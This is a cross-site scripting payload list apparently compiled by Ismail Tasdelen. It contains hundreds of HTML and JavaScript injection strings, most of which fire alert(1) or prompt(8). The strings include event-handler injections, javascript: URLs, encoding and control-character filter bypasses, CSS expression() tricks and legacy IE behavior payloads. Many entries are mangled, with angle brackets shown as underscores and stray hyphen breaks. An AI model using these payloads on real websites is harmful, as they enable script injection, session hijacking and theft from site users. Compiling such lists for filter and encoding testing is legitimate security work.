|
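<!-- Project Name : Cross Site Scripting ( XSS ) Vulnerability Payload List -->
<!-- Author : Ismail Tasdelen -->
<!-- Linkedin : https://www.linkedin.com/in/ismailtasdelen/ -->
<!-- GitHub : https://github.com/ismailtasdelen/ -->
<!-- Twitter : https://twitter.com/ismailtsdln -->
<!-- Medium : https://medium.com/@ismailtasdelen -->
<!-- Use : test inputs for verifying context-aware output encoding and input filtering (HTML body, attribute, URL, script and CSS contexts); most entries call alert(1) or prompt(8) only as a visible execution marker -->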
"-prompt(8)-"
'-prompt(8)-'
";a=prompt,a()//
';a=prompt,a()//
'-eval("window['pro'%2B'mpt'](8)")-'
"-eval("window['pro'%2B'mpt'](8)")-"-
"onclick=prompt(8)_"@x.y
"onclick=prompt(8)__svg/onload=prompt(8)_"@x.y-
_image/src/onerror=prompt(8)_
_img/src/onerror=prompt(8)_
_image src/onerror=prompt(8)_
_img src/onerror=prompt(8)_
_image src =q onerror=prompt(8)_
_img src =q onerror=prompt(8)_
_/scrip_/script_t__img src =q onerror=prompt(8)_
_script\x20type="text/javascript"_javascript:a- lert(1);_/script_
_script\x3Etype="text/javascript"_javascript:a- lert(1);_/script_
_script\x0Dtype="text/javascript"_javascript:a- lert(1);_/script_
_script\x09type="text/javascript"_javascript:a- lert(1);_/script_
_script\x0Ctype="text/javascript"_javascript:a- lert(1);_/script_
_script\x2Ftype="text/javascript"_javascript:a- lert(1);_/script_
_script\x0Atype="text/javascript"_javascript:a- lert(1);_/script_
'`"__\x3Cscript_javascript:alert(1)_/script_
'`"__\x00script_javascript:alert(1)_/script_
_img src=1 href=1 onerror="javascript:alert(1)"__/img_
_audio src=1 href=1 onerror="javascript:alert(1)"__/audio_
_video src=1 href=1 onerror="javascript:alert(1)"__/video_
_body src=1 href=1 onerror="javascript:alert(1)"__/body_
_image src=1 href=1 onerror="javascript:alert(1)"__/image_
_object src=1 href=1 onerror="javascript:alert(1)"__/object_
_script src=1 href=1 onerror="javascript:alert(1)"__/script_
_svg onResize svg onResize="javascript:javascript:alert(1)"__/svg onResize_
_title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"_- _/title onPropertyChange_
_iframe onLoad iframe onLoad="javascript:javascript:alert(1)"__/iframe onLoad_
_body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"__/bo- dy onMouseEnter_
_body onFocus body onFocus="javascript:javascript:alert(1)"__/body onFocus_
_frameset onScroll frameset onScroll="javascript:javascript:alert(1)"__/frames- et onScroll_
_script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"- ;__/script onReadyStateChange_
_html onMouseUp html onMouseUp="javascript:javascript:alert(1)"__/html onMouseUp_
_body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"_- _/body onPropertyChange_
_svg onLoad svg onLoad="javascript:javascript:alert(1)"__/svg onLoad_
_body onPageHide body onPageHide="javascript:javascript:alert(1)"__/body onPageHide_
_body onMouseOver body onMouseOver="javascript:javascript:alert(1)"__/bod- y onMouseOver_
_body onUnload body onUnload="javascript:javascript:alert(1)"__/body onUnload_
_body onLoad body onLoad="javascript:javascript:alert(1)"__/body onLoad_
_bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"_- _/bgsound onPropertyChange_
_html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"__/ht- ml onMouseLeave_
_html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"__/ht- ml onMouseWheel_
_style onLoad style onLoad="javascript:javascript:alert(1)"__/style onLoad_
_iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"- ;__/iframe onReadyStateChange_
_body onPageShow body onPageShow="javascript:javascript:alert(1)"__/body onPageShow_
_style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"- ;__/style onReadyStateChange_
_frameset onFocus frameset onFocus="javascript:javascript:alert(1)"__/framese- t onFocus_
_applet onError applet onError="javascript:javascript:alert(1)"__/applet onError_
_marquee onStart marquee onStart="javascript:javascript:alert(1)"__/marquee onStart_
_script onLoad script onLoad="javascript:javascript:alert(1)"__/script onLoad_
_html onMouseOver html onMouseOver="javascript:javascript:alert(1)"__/htm- l onMouseOver_
_html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)&quo- t;__/html onMouseEnter_
_body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"__/- body onBeforeUnload_
_html onMouseDown html onMouseDown="javascript:javascript:alert(1)"__/htm- l onMouseDown_
_marquee onScroll marquee onScroll="javascript:javascript:alert(1)"__/marque- e onScroll_
_xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"_- _/xml onPropertyChange_
_frameset onBlur frameset onBlur="javascript:javascript:alert(1)"__/frameset onBlur_
_applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"- ;__/applet onReadyStateChange_
_svg onUnload svg onUnload="javascript:javascript:alert(1)"__/svg onUnload_
_html onMouseOut html onMouseOut="javascript:javascript:alert(1)"__/html onMouseOut_
_body onMouseMove body onMouseMove="javascript:javascript:alert(1)"__/bod- y onMouseMove_
_body onResize body onResize="javascript:javascript:alert(1)"__/body onResize_
_object onError object onError="javascript:javascript:alert(1)"__/object onError_
_body onPopState body onPopState="javascript:javascript:alert(1)"__/body onPopState_
_html onMouseMove html onMouseMove="javascript:javascript:alert(1)"__/htm- l onMouseMove_
_applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"- ;__/applet onreadystatechange_
_body onpagehide body onpagehide="javascript:javascript:alert(1)"__/body onpagehide_
_svg onunload svg onunload="javascript:javascript:alert(1)"__/svg onunload_
_applet onerror applet onerror="javascript:javascript:alert(1)"__/applet onerror_
_body onkeyup body onkeyup="javascript:javascript:alert(1)"__/body onkeyup_
_body onunload body onunload="javascript:javascript:alert(1)"__/body onunload_
_iframe onload iframe onload="javascript:javascript:alert(1)"__/iframe onload_
_body onload body onload="javascript:javascript:alert(1)"__/body onload_
_html onmouseover html onmouseover="javascript:javascript:alert(1)"__/htm- l onmouseover_
_object onbeforeload object onbeforeload="javascript:javascript:alert(1)"__/ob- ject onbeforeload_
_body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"__/- body onbeforeunload_
_body onfocus body onfocus="javascript:javascript:alert(1)"__/body onfocus_
_body onkeydown body onkeydown="javascript:javascript:alert(1)"__/body onkeydown_
_iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"__/if- rame onbeforeload_
_iframe src iframe src="javascript:javascript:alert(1)"__/iframe src_
_svg onload svg onload="javascript:javascript:alert(1)"__/svg onload_
_html onmousemove html onmousemove="javascript:javascript:alert(1)"__/htm- l onmousemove_
_body onblur body onblur="javascript:javascript:alert(1)"__/body onblur_
\x3Cscript_javascript:alert(1)_/script_
'"`__script_/* *\x2Fjavascript:alert(1)// */_/script_
_script_javascript:alert(1)_/script\x0D
_script_javascript:alert(1)_/script\x0A
_script_javascript:alert(1)_/script\x0B
_script charset="\x22_javascript:alert(1)_/script_
_!--\x3E_img src=xxx:x onerror=javascript:alert(1)_ --_
--__!-- ---_ _img src=xxx:x onerror=javascript:alert(1)_ --_
--__!-- --\x00_ _img src=xxx:x onerror=javascript:alert(1)_ --_
--__!-- --\x21_ _img src=xxx:x onerror=javascript:alert(1)_ --_
--__!-- --\x3E_ _img src=xxx:x onerror=javascript:alert(1)_ --_
`"'__img src='#\x27 onerror=javascript:alert(1)_
_a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1"_test_/a_
"'`__p__svg__script_a='hello\x27;javascript:alert(1- )//';_/script__/p_
_a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_script_/* *\x2A/javascript:alert(1)// */_/script_
_script_/* *\x00/javascript:alert(1)// */_/script_
_style__/style\x3E_img src="about:blank" onerror=javascript:alert(1)//__/style_
_style__/style\x0D_img src="about:blank" onerror=javascript:alert(1)//__/style_
_style__/style\x09_img src="about:blank" onerror=javascript:alert(1)//__/style_
_style__/style\x20_img src="about:blank" onerror=javascript:alert(1)//__/style_
_style__/style\x0A_img src="about:blank" onerror=javascript:alert(1)//__/style_
"'`_ABC_div style="font-family:'foo'\x7Dx:expression(javascript:ale- rt(1);/*';"_DEF
"'`_ABC_div style="font-family:'foo'\x3Bx:expression(javascript:ale- rt(1);/*';"_DEF
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
_script_if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}_/script_
_script_if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}_/script_
_script_if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}_/script_
'`"__\x3Cscript_javascript:alert(1)_/script_
'`"__\x00script_javascript:alert(1)_/script_
"'`__\x3Cimg src=xxx:x onerror=javascript:alert(1)_
"'`__\x00img src=xxx:x onerror=javascript:alert(1)_
_script src="data:text/plain\x2Cjavascript:alert(1)"__/scr- ipt_
_script src="data:\xD4\x8F,javascript:alert(1)"__/script_<- br />
_script src="data:\xE0\xA4\x98,javascript:alert(1)"__/scri- pt_
_script src="data:\xCB\x8F,javascript:alert(1)"__/script_<- br />
_script\x20type="text/javascript"_javascript:a- lert(1);_/script_
_script\x3Etype="text/javascript"_javascript:a- lert(1);_/script_
_script\x0Dtype="text/javascript"_javascript:a- lert(1);_/script_
_script\x09type="text/javascript"_javascript:a- lert(1);_/script_
_script\x0Ctype="text/javascript"_javascript:a- lert(1);_/script_
_script\x2Ftype="text/javascript"_javascript:a- lert(1);_/script_
_script\x0Atype="text/javascript"_javascript:a- lert(1);_/script_
ABC_div style="x\x3Aexpression(javascript:alert(1)"_DEF
ABC_div style="x:expression\x5C(javascript:alert(1)"_DEFr />
ABC_div style="x:expression\x00(javascript:alert(1)"_DEFr />
ABC_div style="x:exp\x00ression(javascript:alert(1)"_DEFr />
ABC_div style="x:exp\x5Cression(javascript:alert(1)"_DEFr />
ABC_div style="x:\x0Aexpression(javascript:alert(1)"_DEFr />
ABC_div style="x:\x09expression(javascript:alert(1)"_DEFr />
ABC_div style="x:\xE3\x80\x80expression(javascript:alert(1)&quo- t;_DEF
ABC_div style="x:\xE2\x80\x84expression(javascript:alert(1)&quo- t;_DEF
ABC_div style="x:\xC2\xA0expression(javascript:alert(1)"_D- EF
ABC_div style="x:\xE2\x80\x80expression(javascript:alert(1)&quo- t;_DEF
ABC_div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)&quo- t;_DEF
ABC_div style="x:\x0Dexpression(javascript:alert(1)"_DEFr />
ABC_div style="x:\x0Cexpression(javascript:alert(1)"_DEFr />
ABC_div style="x:\xE2\x80\x87expression(javascript:alert(1)&quo- t;_DEF
ABC_div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)&quo- t;_DEF
ABC_div style="x:\x20expression(javascript:alert(1)"_DEFr />
ABC_div style="x:\xE2\x80\x88expression(javascript:alert(1)&quo- t;_DEF
ABC_div style="x:\x00expression(javascript:alert(1)"_DEFr />
ABC_div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)&quo- t;_DEF
ABC_div style="x:\xE2\x80\x86expression(javascript:alert(1)&quo- t;_DEF
ABC_div style="x:\xE2\x80\x85expression(javascript:alert(1)&quo- t;_DEF
ABC_div style="x:\xE2\x80\x82expression(javascript:alert(1)&quo- t;_DEF
ABC_div style="x:\x0Bexpression(javascript:alert(1)"_DEFr />
ABC_div style="x:\xE2\x80\x81expression(javascript:alert(1)&quo- t;_DEF
ABC_div style="x:\xE2\x80\x83expression(javascript:alert(1)&quo- t;_DEF
ABC_div style="x:\xE2\x80\x89expression(javascript:alert(1)&quo- t;_DEF
_a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x05javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x18javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x11javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x17javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x03javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x00javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x10javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x20javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x13javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x09javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x14javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x19javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x07javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x04javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x01javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x08javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x12javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x15javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x16javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x02javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x06javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="javascript\x00:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="javascript\x09:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1"_test_/a_
`"'__img src=xxx:x \x0Aonerror=javascript:alert(1)_
`"'__img src=xxx:x \x22onerror=javascript:alert(1)_
`"'__img src=xxx:x \x0Bonerror=javascript:alert(1)_
`"'__img src=xxx:x \x0Donerror=javascript:alert(1)_
`"'__img src=xxx:x \x2Fonerror=javascript:alert(1)_
`"'__img src=xxx:x \x09onerror=javascript:alert(1)_
`"'__img src=xxx:x \x0Conerror=javascript:alert(1)_
`"'__img src=xxx:x \x00onerror=javascript:alert(1)_
`"'__img src=xxx:x \x27onerror=javascript:alert(1)_
`"'__img src=xxx:x \x20onerror=javascript:alert(1)_
"`'__script_\x3Bjavascript:alert(1)_/script_
"`'__script_\x0Djavascript:alert(1)_/script_
"`'__script_\xEF\xBB\xBFjavascript:alert(1)_/script- _
"`'__script_\xE2\x80\x81javascript:alert(1)_/script- _
"`'__script_\xE2\x80\x84javascript:alert(1)_/script- _
"`'__script_\xE3\x80\x80javascript:alert(1)_/script- _
"`'__script_\x09javascript:alert(1)_/script_
"`'__script_\xE2\x80\x89javascript:alert(1)_/script- _
"`'__script_\xE2\x80\x85javascript:alert(1)_/script- _
"`'__script_\xE2\x80\x88javascript:alert(1)_/script- _
"`'__script_\x00javascript:alert(1)_/script_
"`'__script_\xE2\x80\xA8javascript:alert(1)_/script- _
"`'__script_\xE2\x80\x8Ajavascript:alert(1)_/script- _
"`'__script_\xE1\x9A\x80javascript:alert(1)_/script- _
"`'__script_\x0Cjavascript:alert(1)_/script_
"`'__script_\x2Bjavascript:alert(1)_/script_
"`'__script_\xF0\x90\x96\x9Ajavascript:alert(1)_/sc- ript_
"`'__script_-javascript:alert(1)_/script_
"`'__script_\x0Ajavascript:alert(1)_/script_
"`'__script_\xE2\x80\xAFjavascript:alert(1)_/script- _
"`'__script_\x7Ejavascript:alert(1)_/script_
"`'__script_\xE2\x80\x87javascript:alert(1)_/script- _
"`'__script_\xE2\x81\x9Fjavascript:alert(1)_/script- _
"`'__script_\xE2\x80\xA9javascript:alert(1)_/script- _
"`'__script_\xC2\x85javascript:alert(1)_/script_
"`'__script_\xEF\xBF\xAEjavascript:alert(1)_/script- _
"`'__script_\xE2\x80\x83javascript:alert(1)_/script- _
"`'__script_\xE2\x80\x8Bjavascript:alert(1)_/script- _
"`'__script_\xEF\xBF\xBEjavascript:alert(1)_/script- _
"`'__script_\xE2\x80\x80javascript:alert(1)_/script- _
"`'__script_\x21javascript:alert(1)_/script_
"`'__script_\xE2\x80\x82javascript:alert(1)_/script- _
"`'__script_\xE2\x80\x86javascript:alert(1)_/script- _
"`'__script_\xE1\xA0\x8Ejavascript:alert(1)_/script- _
"`'__script_\x0Bjavascript:alert(1)_/script_
"`'__script_\x20javascript:alert(1)_/script_
"`'__script_\xC2\xA0javascript:alert(1)_/script_
"/__img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:- x /_
"/__img/onerror=\x22javascript:alert(1)\x22src=xxx:- x /_
"/__img/onerror=\x09javascript:alert(1)\x09src=xxx:- x /_
"/__img/onerror=\x27javascript:alert(1)\x27src=xxx:- x /_
"/__img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:- x /_
"/__img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:- x /_
"/__img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:- x /_
"/__img/onerror=\x60javascript:alert(1)\x60src=xxx:- x /_
"/__img/onerror=\x20javascript:alert(1)\x20src=xxx:- x /_
_script\x2F_javascript:alert(1)_/script_
_script\x20_javascript:alert(1)_/script_
_script\x0D_javascript:alert(1)_/script_
_script\x0A_javascript:alert(1)_/script_
_script\x0C_javascript:alert(1)_/script_
_script\x00_javascript:alert(1)_/script_
_script\x09_javascript:alert(1)_/script_
`"'__img src=xxx:x onerror\x0B=javascript:alert(1)_
`"'__img src=xxx:x onerror\x00=javascript:alert(1)_
`"'__img src=xxx:x onerror\x0C=javascript:alert(1)_
`"'__img src=xxx:x onerror\x0D=javascript:alert(1)_
`"'__img src=xxx:x onerror\x20=javascript:alert(1)_
`"'__img src=xxx:x onerror\x0A=javascript:alert(1)_
`"'__img src=xxx:x onerror\x09=javascript:alert(1)_
_script_javascript:alert(1)_\x00/script_
_img src=# onerror\x3D"javascript:alert(1)" _
_input onfocus=javascript:alert(1) autofocus_
_input onblur=javascript:alert(1) autofocus__input autofocus_
_video poster=javascript:javascript:alert(1)//
_body onscroll=javascript:alert(1)__br__br__br__br__br__br_..._br_- _br__br__br__br__br__br__br__br__br_..._br__br__br__br__br__- br__br__br__br__br_..._br__br__br__br__br__br__br__br__br__b- r_..._br__br__br__br__br__br__br__br__br__br_..._br__br__br_- _br__input autofocus_
_form id=test onforminput=javascript:alert(1)__input__/form__button form=test onformchange=javascript:alert(1)_X
_video__source onerror="javascript:javascript:alert(1)"_
_video onerror="javascript:javascript:alert(1)"__source_<- br />
_form__button formaction="javascript:javascript:alert(1)"_X
_body oninput=javascript:alert(1)__input autofocus_
_math href="javascript:javascript:alert(1)"_CLICKME_/mat- h_ _math_ _maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)"_CLICKM- E_/maction_ _/math_
_frameset onload=javascript:alert(1)_
_table background="javascript:javascript:alert(1)"_
_!--_img src="--__img src=x onerror=javascript:alert(1)//"_
_comment__img src="_/comment__img src=x onerror=javascript:alert(1))//"_
_![__img src="]__img src=x onerror=javascript:alert(1)//"_
_style__img src="_/style__img src=x onerror=javascript:alert(1)//"_
_li style=list-style:url() onerror=javascript:alert(1)_ _div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibilit- y:hidden onload=javascript:alert(1)__/div_
_head__base href="javascript://"__/head__body__a href="/. /,javascript:alert(1)//#"_XXX_/a__/body_
_SCRIPT FOR=document EVENT=onreadystatechange_javascript:alert(1)_/SCRIPT_
_OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83&quo- t;__PARAM NAME="DataURL" VALUE="javascript:alert(1)"__/OBJECT_
_object data="data:text/html;base64,%(base64)s"_
_embed src="data:text/html;base64,%(base64)s"_
_b _script_alert(1)_/script_0
_div id="div1"__input value="``onmouseover=javascript:alert(1)"__/div_ _div id="div2"__/div__script_document.getElementById(&q- uot;div2").innerHTML = document.getElementById("div1").innerHTML;_/script- _
_x '="foo"__x foo='__img src=x onerror=javascript:alert(1)//'_
_embed src="javascript:alert(1)"_
_img src="javascript:alert(1)"_
_image src="javascript:alert(1)"_
_script src="javascript:alert(1)"_
_div style=width:1px;filter:glow onfilterchange=javascript:alert(1)_x
_? foo="__script_javascript:alert(1)_/script_"_
_! foo="__script_javascript:alert(1)_/script_"_
_/ foo="__script_javascript:alert(1)_/script_"_
_? foo="__x foo='?__script_javascript:alert(1)_/script_'_"_
_! foo="[[[Inception]]"__x foo="]foo__script_javascript:alert(1)_/script_"_r />
_% foo__x foo="%__script_javascript:alert(1)_/script_"_
_div id=d__x xmlns="__iframe onload=javascript:alert(1)"__/div_ _script_d.innerHTML=d.innerHTML_/script_
_img \x00src=x onerror="alert(1)"_
_img \x47src=x onerror="javascript:alert(1)"_
_img \x11src=x onerror="javascript:alert(1)"_
_img \x12src=x onerror="javascript:alert(1)"_
_img\x47src=x onerror="javascript:alert(1)"_
_img\x10src=x onerror="javascript:alert(1)"_
_img\x13src=x onerror="javascript:alert(1)"_
_img\x32src=x onerror="javascript:alert(1)"_
_img\x47src=x onerror="javascript:alert(1)"_
_img\x11src=x onerror="javascript:alert(1)"_
_img \x47src=x onerror="javascript:alert(1)"_
_img \x34src=x onerror="javascript:alert(1)"_
_img \x39src=x onerror="javascript:alert(1)"_
_img \x00src=x onerror="javascript:alert(1)"_
_img src\x09=x onerror="javascript:alert(1)"_
_img src\x10=x onerror="javascript:alert(1)"_
_img src\x13=x onerror="javascript:alert(1)"_
_img src\x32=x onerror="javascript:alert(1)"_
_img src\x12=x onerror="javascript:alert(1)"_
_img src\x11=x onerror="javascript:alert(1)"_
_img src\x00=x onerror="javascript:alert(1)"_
_img src\x47=x onerror="javascript:alert(1)"_
_img src=x\x09onerror="javascript:alert(1)"_
_img src=x\x10onerror="javascript:alert(1)"_
_img src=x\x11onerror="javascript:alert(1)"_
_img src=x\x12onerror="javascript:alert(1)"_
_img src=x\x13onerror="javascript:alert(1)"_
_img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"_-
_img src=x onerror=\x09"javascript:alert(1)"_
_img src=x onerror=\x10"javascript:alert(1)"_
_img src=x onerror=\x11"javascript:alert(1)"_
_img src=x onerror=\x12"javascript:alert(1)"_
_img src=x onerror=\x32"javascript:alert(1)"_
_img src=x onerror=\x00"javascript:alert(1)"_
_a href=java&a- mp;#8script:javascript:alert(1)_XXX_/a_
_img src="x` `_script_javascript:alert(1)_/script_"` `_
_img src onerror /" '"= alt=javascript:alert(1)//"_
_title onpropertychange=javascript:alert(1)__/title__title title=_
_a href=http://foo.bar/#x=`y__/a__img alt="`__img src=x:x onerror=javascript:alert(1)__/a_"_
_!--[if]__script_javascript:alert(1)_/script --_
_!--[if_img src=x onerror=javascript:alert(1)//]_ --_
_script src="/\%(jscript)s"__/script_
_script src="\\%(jscript)s"__/script_
_object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598&quo- t;__/object_ _object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B&quo- t; onqt_error="javascript:alert(1)" style="behavior:url(#x);"__param name=postdomevents /__/object_
_a style="-o-link:'javascript:javascript:alert(1)';-o-link- -source:current"_X
_style_p[foo=bar{}*{-o-link:'javascript:javascript:alert- (1)'}{}*{-o-link-source:current}]{color:red};_/style_
_link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d
_style_@import "data:,*%7bx:expression(javascript:alert(1))%7D";_- /style_
_a style="pointer-events:none;position:absolute;"__a style="position:absolute;" onclick="javascript:alert(1);"_XXX_/a__/a__a href="javascript:javascript:alert(1)"_XXX_/a_
_style_*[{}@import'%(css)s?]_/style_X
_div style="font-family:'foo ;color:red;';"_XXX-
_div style="font-family:foo}color=red;"_XXX
_// style=x:expression\28javascript:alert(1)\29_
_style_*{x:expʍ- 62;essiʍ- 59;n(javascript:alert(1))}_/style_
_div style=content:url(%(svg)s)__/div_
_div style="list-style:url(http://foo.f)\20url(javascript:ja- vascript:alert(1));"_X
_div id=d__div style="font-family:'sans\27\3B color\3Ared\3B'"_X_/div__/div_ _script_with(document.getElementById("d"))innerHTM- L=innerHTML_/script_
_div style="background:url(/f#oo/;color:red/*/foo.- jpg);"_X
_div style="font-family:foo{bar;background:url(http://foo.f/- oo};color:red/*/foo.jpg);"_X
_div id="x"_XXX_/div_ _style_ #x{font-family:foo[bar;color:green;} #y];color:red;{} _/style_
_x style="background:url('x;color:red;/*')"_X- XX_/x_
_script_({set/**/$($){_/**/setter=$,_=javascript:alert(1- )}}).$=eval_/script_
_script_({0:#0=eval/#0#/#0#(javascript:alert(1))})_/scri- pt_
_script_ReferenceError.prototype.__defineGetter__('name'- , function(){javascript:alert(1)}),x_/script_
_script_Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()_/scr- ipt_
_meta charset="x-imap4-modified-utf7"_&ADz&AGn&a- mp;AG0&AEf&ACA&AHM&AHI&AGO&AD0&A- Gn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoAD- EAKQ&ACAAPABi
_meta charset="x-imap4-modified-utf7"_&_script&S- 1&TS&1_alert&A7&(1)&R&UA;&&_- &A9&11/script&X&_
_meta charset="mac-farsi"_¼script¾javascript:alert(1)¼/s- cript¾
X_x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` _
1_set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:- alert(1)>`_
1_animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascri- pt:alert(1)>_
_vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100- %;height:100% src=%(vml)s#xss__/vmlframe_
1_a href=#__line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /__/a_
_a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)"_XXX_/a_
_x style="behavior:url(%(sct)s)"_
